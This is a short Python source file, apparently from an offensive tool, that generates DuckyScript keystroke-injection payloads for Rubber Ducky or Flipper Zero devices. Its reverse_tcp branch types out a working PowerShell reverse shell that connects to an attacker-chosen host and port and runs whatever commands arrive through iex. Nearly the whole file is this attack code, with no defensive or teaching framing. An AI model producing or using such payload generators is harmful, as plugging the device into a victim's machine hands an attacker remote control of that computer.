# duckyscript payload generator
# generates hid attack scripts for rubber ducky / flipper zero

from generators.base import BaseGenerator


class DuckyGenerator(BaseGenerator):
    LANG_ID = "ducky"
    LANG_NAME = "DuckyScript"
    FILE_EXT = ".txt"

    def generate(self, host, port, opts, ptype, tpl, adv):
        code = "REM generated by nextral venomous\nDELAY 1000\nGUI r\nDELAY 200\nSTRING powershell\nENTER\nDELAY 500\n"

        if ptype == "reverse_tcp":
            ps = (
                f"$c = New-Object System.Net.Sockets.TCPClient('{host}',{port});"
                f"$s = $c.GetStream();"
                f"[byte[]]$b = 0..65535|%{{0}};"
                f"while(($i = $s.Read($b, 0, $b.Length)) -ne 0)"
                f"{{$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);iex $d}}"
            )
            code += f"STRING {ps}\nENTER\n"
        else:
            code += "STRING echo 'payload ready.'\nENTER\n"

        return code
